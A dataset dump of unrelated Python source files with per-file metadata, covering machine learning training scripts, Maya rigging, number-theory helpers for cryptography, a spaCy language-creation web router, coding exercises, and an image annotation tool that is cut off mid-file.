= top_gene_df.groupby(['Group', 'gene_biotype']).size()\n top_gene_type_port_df = top_gene_type_df.div(top_gene_count_df, axis=0)\n top_gene_type_port_df.columns = [f'{each}_portion' for each in\n top_gene_type_port_df.columns]\n top_gene_type_port_df = pd.concat([top_gene_type_df,\n top_gene_type_port_df],\n axis=1)\n top_gene_type_port_df.to_csv(outfile, sep='\\t', float_format='%.3f')\n\n\nif __name__ == '__main__':\n fire.Fire()\n","sub_path":"expression/exp_summary.py","file_name":"exp_summary.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"379831733","text":"from __future__ import print_function\nimport sys\nimport time\nimport theano\nimport theano.tensor as T\nimport theano.tensor.extra_ops as ex\nimport lasagne\nimport load\nimport mini_batch\nimport numpy\nimport fisher_info as info\nimport save_param as files\nimport preprocessing\nfrom scipy.misc import toimage\nfrom lasagne.regularization import regularize_layer_params_weighted, l2, l1\nfrom lasagne.regularization import regularize_layer_params\n\nnumpy.random.seed(25)\ndef build_net(input_var):\n\n\n l_in = lasagne.layers.InputLayer(shape=(None,784),\n input_var=input_var)\n\n l_hid_0 =lasagne.layers.DenseLayer(l_in,num_units=400,nonlinearity=lasagne.nonlinearities.rectify,\n b = None)\n\n l_out = lasagne.layers.DenseLayer(\n\n l_hid_0, num_units=10,\n nonlinearity=lasagne.nonlinearities.softmax,b = None)\n\n return l_out\n\n\n\nprint(\"Loading data...\")\nX_train, y_train, X_val, y_val,X_test,y_test= load.load_minst()\n#X_train, y_train, X_val, y_val = load.load_cifar10()\npass_weight = None\n\ninput_var = T.fmatrix('inputs')\ntarget_var = T.ivector('targets')\n\nprint(\"Building model and...\")\n\nnetwork = build_net(input_var)\nprediction = lasagne.layers.get_output(network)\n\nloss = lasagne.objectives.categorical_crossentropy(prediction, target_var)\nloss = loss.mean()\n\n# Get network params, with specifications of manually updated ones\nparams = lasagne.layers.get_all_params(network, trainable=True)\ngradient = theano.grad(loss, params)\nupdates = lasagne.updates.sgd(loss,params,learning_rate=0.1)\n#updates = lasagne.updates.adam(loss,params)\n#updates = lasagne.updates.nesterov_momentum(loss,params,learning_rate=0.01)\n\ntest_prediction = lasagne.layers.get_output(network, deterministic=True)\ntest_loss = lasagne.objectives.categorical_crossentropy(test_prediction, target_var)\ntest_loss = test_loss.mean()\ntest_acc = T.mean(T.eq(T.argmax(test_prediction, axis=1), target_var),dtype=theano.config.floatX)\n\n# Compile theano function computing the training validation loss and accuracy:\ntrain_fn = theano.function([input_var, target_var], loss, updates=updates)\nval_fn = theano.function([input_var, target_var], [test_loss, test_acc,test_prediction])\ngradient_fn = theano.function([input_var, target_var], gradient)\n\n\n\n# The training loop\nprint(\"Starting training...\")\nnum_epochs = 20\nfor epoch in range(num_epochs):\n\n # In each epoch, we do a full pass over the training data:\n\n train_err = 0\n train_batches = 0\n start_time = time.time()\n\n for batch in mini_batch.iterate_minibatches(X_train, y_train, 500, shuffle=True):\n\n inputs, targets = batch\n train_err += train_fn(inputs, targets)\n train_batches += 1\n\n\n # And a full pass over the validation data:\n val_err = 0\n val_acc = 0\n val_batches = 0\n\n for batch in mini_batch.iterate_minibatches(X_val, y_val, 500, shuffle=False):\n\n inputs, targets = batch\n err, acc,pre = val_fn(inputs, targets)\n val_err += err\n val_acc += acc\n val_batches += 1\n\n\n # Then we print the results for this epoch:\n\n print(\"Epoch {} of {} took {:.3f}s\".format(\n epoch + 1, num_epochs, time.time() - start_time))\n\n print(\" training loss:\\t\\t{:.6f}\".format(train_err / train_batches))\n print(\" validation loss:\\t\\t{:.6f}\".format(val_err / val_batches))\n print(\" validation accuracy:\\t\\t{:.2f} %\".format(val_acc / val_batches * 100))\n\n\nval_err,acc,val_predict = val_fn(X_val,y_val)\nprint(val_predict.shape)\ninformation = info.evaluate_fisher_info(gradient_fn,X_val,val_predict,y_val,params)\nfiles.save_information(information,0)\nfiles.save_param(params)\n\nimport matplotlib.pyplot as plt\nplt.hist(information[1].flatten(), bins='auto') # plt.hist passes it's arguments to np.histogram\nplt.title(\"Histogram with 'auto' bins\")\nplt.show()\n\"\"\"\nprint(\"Evaluating Fisher Information\")\ninformation = Info.evaluate_fisher_info(gradient_fn,X_val[::10],y_val[::10],params)\nprint(numpy.max(information[1]))\n\n\"\"\"\n","sub_path":"dense_2_layer.py","file_name":"dense_2_layer.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"632148753","text":"import pymel.core as pm\n\nfrom ..utils import libCtrl as controller\n\nreload(controller)\n\n# ------- Global suffixes ------\nBNDJNT = 'BND'\nFKJNT = 'FK'\nIKJNT = 'IK'\nDRVJNT = 'DRV'\nCTRL = 'ctrl'\nCTRLGRP = 'ctrl_grp'\n\n\n# ------------------------------\n\nclass RigNode(object):\n def __init__(self, *args, **kargs):\n self.rnSide = ''\n self.rnMirrored = 0\n self.rnStrLeft = 'L'\n self.rnStrRight = 'R'\n self.rnBndChain = []\n self.rnFkChain = []\n self.rnIkChain = []\n self.rnRbnChain = []\n # -----------------------------\n self.rnJntPos = kargs.setdefault('position', [])\n self.rnName = kargs.setdefault('name', 'rigNode')\n\n def buildBndJnt(self):\n pm.select(cl=1)\n jntList = []\n for i in range(1, len(rnJntPos)):\n jnt = pm.joint(n=self.side + self.name + '_' + str(i) + '_' + BNDJNT, p=pos)\n jntList.append(jnt)\n pm.joint(jntList[0], e=True, oj='xyz', secondaryAxisOrient='yup', zso=True)\n pm.select(cl=1)\n\n def setAttributes(self):\n pass\n\n def buildDrv(self, suffix):\n drvChain = []\n for jnt in self.bndChain:\n dup = pm.duplicate(jnt, po=1)[0]\n dup.rename(jnt.name().replace(BNDJNT, suffix))\n drvChain.append(dup)\n for i in range((len(drvChain) - 1), 0, -1):\n pm.parent(drvChain[i], drvChain[i - 1])\n '''\n drvRoot = pm.duplicate(self.bndChain[0])[0]\n drvRoot.rename(self.bndChain[0].name().replace(BNDJNT,suffix))\n drvRelatives = drvRoot.listRelatives(ad=True,type='joint',pa=True)\n drvRelatives.reverse()\n toDelete = drvRelatives[3:]\n drvRelatives = drvRelatives[:3]\n pm.delete(toDelete)\n\n for jnt in drvRelatives:\n jnt.rename(jnt.name().split('|')[-1].replace(BNDJNT,suffix))\n\n drvChain = [drvRoot] + drvRelatives\n for jnt in drvChain:\n if 'Roll' in jnt.name():\n print jnt\n #pm.removeJoint(jnt)\n '''\n return drvChain\n","sub_path":"bd_rig/rig/rigNode.py","file_name":"rigNode.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"415698968","text":"# -*- coding: utf-8 -*-\n'''\nCurse of Dimensionality\n\nConcept: Points become the same distance from one another in high dimensional\nSpace.\n\nIdea: Show that the distribution of distance between points approaches a \ndelta function at the maximum distance between points\n\nMay need to normalize this by the maximum distane between points to be convincing\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.spatial.distance as dm\nimport config as cfg\n\nplt.close()\n\ndef dimbox(ndim,nsamples):\n return np.random.rand(nsamples,ndim)\n\ndef averagedistance(coordinates):\n nvalues = coordinates.shape[0]\n dist_between_points = dm.cdist(coordinates,coordinates)\n dbp = dist_between_points[np.triu_indices(nvalues,k=1)]\n return (dbp.std(),dbp.mean())\n \n# hist,bin_edges = np.histogram(dbp,bins=50)\n# return (hist,bin_edges,np.std(dbp),np.mean(dbp))\n\n# return np.mean(dbp)\n\ndef maxdistance(dim):\n return np.sqrt(dim)\n \n \n \n#dimensions = np.array([1,10,100,1000,10000])\ndimensions = np.round(np.logspace(0,4,40)).astype(int)\nndim = len(dimensions)\nnum_points = 1000\nfraction = np.zeros(ndim)\navg_distance = np.zeros(ndim)\nmax_distance = np.zeros(ndim)\nmin_distance = np.zeros(ndim)\nstd = np.zeros(ndim)\nmean = np.zeros(ndim)\n\nplt.figure(figsize=(6,5))\nfor i,dim in enumerate(dimensions):\n print('Dim = {}'.format(dim))\n # Create the data\n data = dimbox(dim,num_points)\n # Calculate the average distance between points\n# avg_distance[i] = averagedistance(data)\n \n std[i],mean[i] = averagedistance(data)\n \n# hist,bin_edges,var[i],mean[i] = averagedistance(data)\n# plt.plot(bin_edges[:-1],hist/(sum(hist)*(bin_edges[1]-bin_edges[0])),label='{}-d'.format(dim))\n \nplt.semilogx(dimensions,std/mean,color='#00B050',linewidth=2)\n#plt.semilogx(dimensions,avg_distance/max_distance,'k')\n#plt.semilogx(dimensions,max_distance,'k')\n#plt.legend()\nplt.xlabel('Number of Dimensions')\nplt.ylabel('Coefficient of Variation\\n(standard deviation / mean)')\nplt.grid('on')\nplt.tight_layout()\n \nplt.savefig(cfg.dir_figures + 'lecture01e_c.png',dpi=300)","sub_path":"lecture01e_c.py","file_name":"lecture01e_c.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"401647324","text":"import numpy as np\nimport math as m\nimport os\n\ndef multiply(X, Y): ## yields the matrix product X*Y\n result = [[sum(a * b for a, b in zip(X_row, Y_col)) for Y_col in zip(*Y)] for X_row in X]\n return result\n\ndef rotate(matrix, phi):\n xx = m.cos(phi) # cosine of phi in radian\n xy = -m.sin(phi)\n yx = m.sin(phi)\n yy = m.cos(phi)\n rotation = np.array([[xx, xy], [yx, yy]])\n\n return np.matmul(rotation, matrix) ## rotation applied from the left (as last step)\n\ndef mirrorX(): # mirroring at x-axis\n mirror = np.array([[-1, 0], [0, 1]])\n return mirror\n\ndef mirrorY(matrix): # mirroring at y-axis\n mirror = np.array([[1, 0], [0, -1]])\n return mirror\n\n## begin with scaling and mirroring (in arbitrary order) to correctly interpret your results!, rotations on top...\n\ndef scale(xx,yy):\n scale = np.array([[xx, 0], [0, yy]])\n return scale\n\ndef normalize(matrix): ## normalize uniformly to max(det(tensor_field))*Pi for real data to capture relative change (instead of directional)\n det = np.linalg.det(matrix)\n if det != 0:\n c = 1/np.sqrt(det)#*np.pi)\n else:\n c = 0\n\n scale = np.array([[c, 0], [0, c]])\n return np.matmul(scale, matrix)\n\n\n# --> create parameter to control intensity of light src until saturation - inverse mode (black/white) (1-I): \"Negativ\"\n\n# calculater of txt file len\ndef file_len(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return i + 1\n\nidentity = np.array([[1, 0],[0, 1]]) ## row-major ordering: row-by-row\nzero = np.array([[0, 0],[0, 0]]) ## row-major ordering: row-by-row\nlength = 101\n\ndeg1 = 90\nrad1 = deg1*(np.pi/180.0)\ndeg2 = 45\nrad2 = deg2*(np.pi/180.0)\nmatrixArray = np.ndarray(shape=(length,length), dtype=np.ndarray) # initialize ndarray w 0\n\n\n# generate normalized tensors from linear transformations\nwith open('temp.txt', 'wb') as f:\n for j in range(length): # rows\n for i in range(length): # cols\n rotated = normalize(identity) # initialization w. zeros\n iInverse = length-1-i # use inverted x coordinates (mirroring at y-axis in array reference frame)\n if i == (length-1)/2:\n scaled = np.matmul(scale(1, 1), identity) # use isotropic scaling (1,1) - src; (0,0) - sink\n else:\n scaled = np.matmul(scale(0.5, 0.5), identity) # chronological transformation order: right->left\n\n normalized = normalize(scaled) # ..->transforms\n matrixArray[j][i] = scaled # update matrixArray entry\n\n np.savetxt(f, matrixArray[j][i], fmt='%s', delimiter=' ', newline='\\r\\n') # add matrix to temp.txt\n\n\n# reorder the output tensor field into a regular grid\ni = 1\nstr1 = \"\"\nstr2 = \"\"\nwith open('temp.txt', 'r+') as txtfile:\n with open('tensor_field.txt', 'w+') as tensor_field:\n for line in txtfile:\n line = line.rstrip() # remove newline/whitespace chars from line ends (the right)\n if i % 2 == 0: # if even line\n str2 += \" \" + line # concatenate row2 (lower line)\n else:\n str1 += \" \" + line # concatenate row1 (upper line)\n\n if i % (2*length) == 0: # if one row (in matrixArray) passed.., write results\n tensor_field.write(str1) # write row 1 (upper line)\n tensor_field.write('\\n' + str2 + '\\n') # write row 2 (lower line)\n str1 = str2 = \"\" # ..reset line strings\n\n i += 1 #increment line index\n\nos.remove('temp.txt')\n","sub_path":"TensorFields/absorb.py","file_name":"absorb.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"267636692","text":"import pgzrun # 导入游戏库\nimport random # 导入随机库\n\nTILE_SIZE = 50 # 小方块的大小,50*50\nWIDTH = 10*TILE_SIZE # 设置窗口的宽度 500\nHEIGHT = 10*TILE_SIZE # 设置窗口的高度 500\n\nstars = [] # 二维数组,开始为空列表,用于储存小方块颜色编号\nfor i in range(10): # 对行遍历\n row = [] # 存储一行的数据,开始为空列表\n for j in range(10): # 对列遍历\n x = random.randint(1, 6) # 取1-6之间的随机数\n row.append(x) # 把数据添加到行列表row中\n stars.append(row) # 再行列表row添加到二维数组stars中\n\ndef draw(): # 绘制模块,每帧重复执行\n screen.clear() # 每帧清除屏幕,便于重新绘制\n # 以下绘制出所有小方块的编号\n for i in range(10):\n for j in range(10):\n screen.draw.text(str(stars[i][j]),\n (j*TILE_SIZE, i*TILE_SIZE), fontsize=35, color='white')\n\npgzrun.go() # 开始执行���戏\n","sub_path":"PygameZero/python游戏趣味编程代码/第11章/11-2-2.py","file_name":"11-2-2.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"349537281","text":"# Important algorithms for cryptography\n\ndef Euclidean(a, b):\n '''\n Find the GCD of a, b using the Euclidean Algorithm\\n\n Inputs:\n integers a, b\n Outputs:\n integer GCD\n Runtime: O(log(min(a,b)))\n '''\n # Iterative so as to not exceed Python recursion depth\n while a != 0:\n temp = a\n a = b % a\n b = temp\n return b\n\ndef GCD(a, b):\n '''\n Find the GCD of a, b using the Euclidean Algorithm\\n\n Alias of Euclidean(a, b)\\n\n Inputs:\n integers a, b\n Outputs:\n integer GCD\n Runtime: O(log(min(a,b)))\n '''\n return Euclidean(a, b)\n\ndef ExtendedEuclidean(a, b):\n '''\n If the GCD of a, b is 1, find x, y such that ax + by = 1\\n\n Inputs:\n integers a, b\n Outputs:\n integers GCD, x, y\n '''\n x = 0\n y = 1\n u = 1\n v = 0\n while a != 0:\n # same loop as Euclidean\n\n # Find q, r in b = qa + r\n q, r = b // a, b % a\n\n # Update a, b\n a, b = r, a\n\n # Perform backsubstition, update values\n up, vp = x - u * q, y - v * q\n x, y = u, v\n u, v = up, vp\n return b, x, y\n\ndef ModularInv(a, n, prime=False):\n '''\n Computes the modular inverse of a mod n\\n\n Inputs:\n integers a, n\n (optional) boolean prime\n Outputs:\n integer aInv\n '''\n if prime:\n # Use Fermat's Theorem shortcut: a^-1 = a^(p-2) mod p\n return FastPower(a, n-2, n)\n else:\n GCD, x, y = ExtendedEuclidean(a, n)\n if GCD == 1:\n return x % n\n else:\n raise Exception('ModularInv: ' + str(a) + ' does not have an inverse mod ' + str(n))\n\ndef FastPower(a, e, n):\n '''\n Computes the exponentiation of a^e mod n by successive squaring\\n\n Inputs:\n integers a, e, n\n Output:\n integer aPow\n '''\n return pow(a, e, n)\n\ndef ChineseRemainderThm(a, m, b, n):\n '''\n Finds one modular congruency x = c mod mn that is equivalent to the linear congruencies x = a mod m, x = b mod n\\n\n Inputs:\n integers a, m, b, n\n Outputs:\n integers c, mn\n '''\n g, s, t = ExtendedEuclidean(m, n)\n c = (b * m * s + a * n * t) % (m * n)\n return c, (m * n)\n\n\n\n","sub_path":"Algorithms/Algorithms.py","file_name":"Algorithms.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"309920994","text":"#Take input as an image\r\n#Then compare it with the source and finally print out what numbers are in the input\r\nfrom helpers import takeinput, insert, compare, showresult\r\n\r\ndef main():\r\n\t#Take input image and convert it into 3 parts presenting 3 numbers\r\n\tinputurl = \"C:\\\\Users\\\\Tan\\\\Desktop\\\\digital_screen\\\\DigitsScreen\\\\empty.png\"\r\n\tinputnumbers = takeinput(inputurl)\r\n\t\r\n\t#Import the source number to compare\r\n\tsource = \"C:\\\\Users\\\\Tan\\\\Desktop\\\\digital_screen\\\\source_numbers\\\\\"\r\n\tnumber = insert(source)\r\n\t\r\n\t#Compare the processed input with the source numbers\r\n\tresult = compare(inputnumbers, number)\r\n\t\r\n\t#Format the result into xx,x*C\r\n\tshowresult(result)\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n","sub_path":"digit_scanner.py","file_name":"digit_scanner.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"243510292","text":"import sys\nimport httpx\nimport json\nimport spacy\nimport shutil\nimport subprocess\nfrom pathlib import Path\nfrom typing import Optional\nfrom fastapi import APIRouter, Depends\nfrom fastapi import Request, Form\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.responses import RedirectResponse\n\nfrom app.util.create_object import create_object\nfrom app.util.clone_object import clone_object\nfrom app.util.lookups_data import create_lookups_data, clone_lookups_data\nfrom app.util.login import get_current_username\n\ntemplates = Jinja2Templates(directory=\"app/templates\")\n\nrouter = APIRouter(dependencies=[Depends(get_current_username)])\n# Get list of currently support Language objects from spacy.lang\nspacy_path = Path(spacy.__file__.replace(\"__init__.py\", \"\"))\nspacy_lang = spacy_path / \"lang\"\nspacy_languages = json.dumps([i.stem for i in spacy_lang.iterdir() if len(i.stem) < 3])\n\n\n@router.get(\"/create\")\nasync def create(request: Request):\n # Check if a new language exists already, give option to delete if so\n\n new_lang = Path.cwd() / \"new_lang\"\n if len(list(new_lang.iterdir())) > 0:\n name = list(new_lang.iterdir())[0].name\n message = f\"Edit init file
Delete {name.title()}

Next\"\n return templates.TemplateResponse(\n \"create.html\",\n {\n \"request\": request,\n \"spacy_languages\": spacy_languages,\n \"message\": message,\n },\n )\n else:\n return templates.TemplateResponse(\n \"create.html\", {\"request\": request, \"spacy_languages\": spacy_languages}\n )\n\n\n@router.post(\"/create\")\nasync def create_post(\n request: Request,\n lang_name: str = Form(...),\n lang_code: str = Form(...),\n spacy_language: Optional[str] = Form(None),\n dependencies: Optional[str] = Form(None),\n direction: str = Form(...),\n has_letters: bool = Form(False),\n has_case: bool = Form(False),\n):\n print(has_letters, has_case)\n if dependencies:\n for dep in dependencies.split(\",\"):\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", dep])\n\n if spacy_language:\n lang_name, lang_code = clone_object(lang_name, lang_code, spacy_language)\n clone_lookups_data(lang_name, lang_code, spacy_language)\n\n else:\n lang_name, lang_code = create_object(\n lang_name, lang_code, direction, has_case, has_letters\n )\n create_lookups_data(lang_name, lang_code)\n\n new_lang = Path.cwd() / \"new_lang\"\n if len(list(new_lang.iterdir())) > 0:\n name = list(new_lang.iterdir())[0].name\n message = f\"Edit init file
Delete {name.title()}

Next\"\n return templates.TemplateResponse(\n \"create.html\",\n {\n \"request\": request,\n \"spacy_languages\": spacy_languages,\n \"message\": message,\n },\n )\n else:\n return templates.TemplateResponse(\n \"create.html\", {\"request\": request, \"spacy_languages\": spacy_languages}\n )\n\n\n@router.get(\"/delete_new_lang/{name}\")\nasync def delete(name: str):\n new_lang = Path.cwd() / \"new_lang\" / name\n shutil.rmtree(new_lang)\n return RedirectResponse(url=\"/create\")\n\n\n# Select2 endpoint\n@router.get(\"/spacy_languages\") # /spacy_languages?term=Russian&_type=query&q=Russian\nasync def language_options(\n _type: Optional[str] = None, term: Optional[str] = None, q: Optional[str] = None\n):\n response = {}\n response[\"results\"] = []\n\n # TODO automatically load most recent languages.json from explosion\n spacy_languages = httpx.get(\n \"https://raw.githubusercontent.com/explosion/spaCy/8cc5ed6771010322954c2211b0e1f5a0fd14828a/website/meta/languages.json\"\n ).json()\n for lang in spacy_languages[\"languages\"]:\n if q:\n if q in lang[\"name\"]:\n response[\"results\"].append({\"id\": lang[\"name\"], \"text\": lang[\"name\"]})\n else:\n response[\"results\"].append({\"id\": lang[\"name\"], \"text\": lang[\"name\"]})\n\n return response\n","sub_path":"app/routers/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":5129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"51212784","text":"import os.path as osp\nfrom collections import defaultdict\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torch import autograd\nfrom torch.optim import Adam\n\nimport numpy as np\nfrom numpy import array\nfrom numpy.random import choice, randint\n\nfrom generic_map import GenericMap\nfrom base_map import BaseMap\nfrom neural_process import NeuralProcessV1\nfrom aggregators import sum_aggregator, mean_aggregator, tanh_sum_aggregator\n\nfrom tasks.sinusoidal import SinusoidalTask\nfrom tasks.linear import LinearTask\n\nfrom rlkit.core.vistools import save_plot, plot_returns_on_same_plot\nfrom neural_processes.distributions import sample_diag_gaussians, local_repeat\n\n# -----------------------------------------------------------------------------\nN_tasks = 100\nbase_map_lr = encoder_lr = r_to_z_map_lr = 1e-3\nmax_iters = 10001\nnum_tasks_per_batch = 64\nreplace = False\n\ndata_sampling_mode = 'constant'\nnum_per_task_high = 10\n\n# -----------------------------------------------------------------------------\nslopes = np.linspace(-1, 1, N_tasks)\nall_tasks = [LinearTask(slope) for slope in slopes]\ndef generate_data_batch(tasks_batch, num_samples_per_task, max_num):\n # Very inefficient will need to fix this\n X = torch.zeros(len(tasks_batch), max_num, 1)\n Y = torch.zeros(len(tasks_batch), max_num, 1)\n for i, (task, num_samples) in enumerate(zip(tasks_batch, num_samples_per_task)):\n num = int(num_samples)\n x, y = task.sample(num)\n if num==max_num:\n X[i,:] = x\n Y[i,:] = y\n else:\n X[i,:num] = x\n Y[i,:num] = y\n\n return Variable(X), Variable(Y)\n\n# -----------------------------------------------------------------------------\nenc_dim = 40\nencoder = nn.Sequential(\n nn.Linear(2, enc_dim),\n nn.BatchNorm1d(enc_dim),\n nn.ReLU(),\n nn.Linear(enc_dim, enc_dim),\n nn.BatchNorm1d(enc_dim),\n nn.ReLU(),\n nn.Linear(enc_dim, enc_dim)\n)\nclass R2Z(nn.Module):\n def __init__(self):\n super(R2Z, self).__init__()\n dim = 40\n self.hidden = nn.Sequential(\n nn.Linear(enc_dim, dim),\n nn.ReLU(),\n nn.BatchNorm1d(dim),\n nn.Linear(dim, dim),\n nn.BatchNorm1d(dim),\n nn.ReLU()\n )\n self.mean_layer = nn.Linear(dim, 1)\n self.log_cov_layer = nn.Linear(dim, 1)\n \n def forward(self, r):\n hid_out = self.hidden(r)\n return self.mean_layer(hid_out), self.log_cov_layer(hid_out)\nr_to_z_map = R2Z()\n\n# class Z2W(nn.Module):\n# def __init__(self):\n# super(Z2W, self).__init__()\n# self.z_l1 = nn.Linear(40,10)\n# self.z_l2 = nn.Linear(40,100)\n# self.z_l3 = nn.Linear(40,10)\n \n# def forward(self, z):\n# return self.z_l1(z), self.z_l2(z), self.z_l3(z)\n# z2w = Z2W()\n\n\n# class BaseMap(nn.Module):\n# def __init__(self):\n# super(BaseMap, self).__init__()\n# dim = 200\n# self.hidden = nn.Sequential(\n# nn.Linear(41, dim),\n# nn.BatchNorm1d(dim),\n# nn.ReLU(),\n# nn.Linear(dim, dim),\n# nn.BatchNorm1d(dim),\n# nn.ReLU(),\n# nn.Linear(dim, dim),\n# nn.BatchNorm1d(dim),\n# nn.ReLU(),\n# nn.Linear(dim, dim),\n# nn.BatchNorm1d(dim),\n# nn.ReLU(),\n# nn.Linear(dim, 1)\n# )\n \n# def forward(self, z, x):\n# return self.hidden(torch.cat([z,x],1))\n# base_map = BaseMap()\n\nencoder_optim = Adam(encoder.parameters(), lr=encoder_lr)\nr_to_z_map_optim = Adam(r_to_z_map.parameters(), lr=r_to_z_map_lr)\n# z2w_optim = Adam(z2w.parameters(), lr=base_map_lr)\n# base_map_optim = Adam(base_map.parameters(), lr=base_map_lr)\n# -----------------------------------------------------------------------------\ntest_elbos = defaultdict(list)\ntest_log_likelihoods = defaultdict(list)\nfor iter_num in range(max_iters):\n task_batch_idxs = choice(len(all_tasks), size=num_tasks_per_batch, replace=replace)\n num_samples_per_task = array([num_per_task_high for _ in range(num_tasks_per_batch)])\n max_num = num_per_task_high\n \n X, Y = generate_data_batch([all_tasks[i] for i in task_batch_idxs], num_samples_per_task, max_num)\n N_tasks, N_samples, X_dim = X.size(0), X.size(1), X.size(2)\n Y_dim = Y.size(2)\n X = X.view(N_tasks*N_samples, X_dim)\n Y = Y.view(N_tasks*N_samples, Y_dim)\n\n encoder_optim.zero_grad()\n r_to_z_map_optim.zero_grad()\n # z2w_optim.zero_grad()\n # base_map_optim.zero_grad()\n\n r = encoder(torch.cat([X,Y], 1))\n r_dim = r.size(-1)\n r = r.view(N_tasks, N_samples, r_dim)\n r = torch.mean(r, 1)\n # r = torch.sum(r, 1)\n mean, log_cov = r_to_z_map(r)\n cov = torch.exp(log_cov)\n\n z = Variable(torch.randn(mean.size())) * cov + mean\n z = local_repeat(z, N_samples)\n\n # Y_pred = base_map(z, X)\n\n Y_pred = X * z\n\n # w1, w2, w3 = z2w(z)\n # w1 = w1.view(-1, 1, w1.size(1))\n # w3 = w3.view(-1, w1.size(-1), 1)\n # Y_pred = torch.matmul(X.view(-1,1,1), w1)\n # Y_pred = torch.matmul(Y_pred, w3)\n # Y_pred = Y_pred.view(-1,1)\n\n KL = -0.5 * torch.sum(\n 1.0 + log_cov - mean**2 - cov\n )\n\n cond_log_likelihood = -0.5 * torch.sum((Y_pred - Y)**2)\n\n neg_elbo = -1.0 * (cond_log_likelihood - KL) / float(N_tasks)\n neg_elbo.backward()\n\n # base_map_optim.step()\n # z2w_optim.step()\n r_to_z_map_optim.step()\n encoder_optim.step()\n\n if iter_num % 100 == 0:\n print('\\nIter %d' % iter_num)\n print('LL: %.4f' % cond_log_likelihood)\n print('KL: %.4f' % KL)\n print('ELBO: %.4f' % (-1.0*neg_elbo))\n print('MSE: %.4f' % (cond_log_likelihood * -2 / (N_tasks * N_samples)))\n","sub_path":"neural_processes/debug_my_neural_process.py","file_name":"debug_my_neural_process.py","file_ext":"py","file_size_in_byte":5778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"372700523","text":"class Pipe:\n def __init__(self, _length, _diameter, _number):\n self.length, self.diameter, self.number = _length, _diameter, _number\n\n def __str__(self):\n return str(self.number)\n\n def __lt__(self, other):\n if self.length != other.length: # 第一关键字 descending\n return self.length > other.length\n if self.diameter != other.diameter: # 第二关键字 ascending\n return self.diameter < other.diameter\n return self.number > other.number\n\n\nT = int(input())\nfor i in range(T):\n n = int(input())\n pipes = []\n for j in range(n):\n length, diameter, number = map(int, input().strip().split())\n pipes.append(Pipe(length, diameter, number))\n pipes.sort()\n print(pipes[0].number)\n","sub_path":"lec20class/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"472981792","text":"#!/usr/bin/env python\n\n\nclass Engineer(object):\n def say(self, name):\n print('{}\\'s major is Computer Science and Technology.'.format(name))\n\n\nu = Engineer()\nu.say('Shuo Wang')\nEngineer.say(u, 'Shuo Wang')\n","sub_path":"method.py","file_name":"method.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"81109756","text":"#coding: utf-8\n\nimport os\nimport cv2\nimport logging\nimport sys\nimport yaml\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\nclass AnnotationGenerator:\n\n CONFIG_YAML = 'config.yml'\n GENERATOR_WINDOW_NAME = 'generator'\n\n def __init__(self):\n\n # log setting\n program = os.path.basename(sys.argv[0])\n self.logger = logging.getLogger(program)\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s')\n\n # load config file\n f = open(self.CONFIG_YAML, 'r')\n self.config = yaml.load(f)\n f.close()\n\n # set dataset path\n self.pos_img_dir = self.config['dataset']['pos_img_dir']\n\n # set output path\n self.my_annotation_dir = self.config['output']['my_annotation_dir']\n self.my_annotation_img_dir = self.config['output']['my_annotation_img_dir']\n\n # create output paths\n if not os.path.isdir(self.my_annotation_dir):\n os.makedirs(self.my_annotation_dir)\n if not os.path.isdir(self.my_annotation_img_dir):\n os.makedirs(self.my_annotation_img_dir)\n\n # set array of all file names\n self.my_annotation_files = [file_name for file_name in os.listdir(self.my_annotation_dir) if not file_name.startswith('.')]\n self.my_annotation_files.sort()\n self.pos_img_files = [file_name for file_name in os.listdir(self.pos_img_dir) if not file_name.startswith('.')]\n self.pos_img_files.sort()\n\n # initialize mouse event\n cv2.namedWindow(self.GENERATOR_WINDOW_NAME)\n cv2.setMouseCallback(self.GENERATOR_WINDOW_NAME, self.on_mouse)\n\n # mouse location\n self.im_orig = None\n self.start_pt = (0, 0)\n self.end_pt = (0, 0)\n self.mouse_dragging = False\n self.bboxes = []\n\n def on_mouse(self, event, x, y, flags, param):\n\n x = min(max(x, 0), self.im_orig.shape[1] - 1)\n y = min(max(y, 0), self.im_orig.shape[0] - 1)\n\n if event == cv2.EVENT_LBUTTONDOWN:\n self.logger.info('DOWN: %d, %d', x, y)\n self.start_pt = (x, y)\n self.end_pt = (x, y)\n self.mouse_dragging = True\n elif event == cv2.EVENT_LBUTTONUP:\n self.logger.info('UP: %d, %d', x, y)\n self.end_pt = (x, y)\n self.bboxes.append((self.start_pt, self.end_pt))\n self.start_pt = self.end_pt = (0, 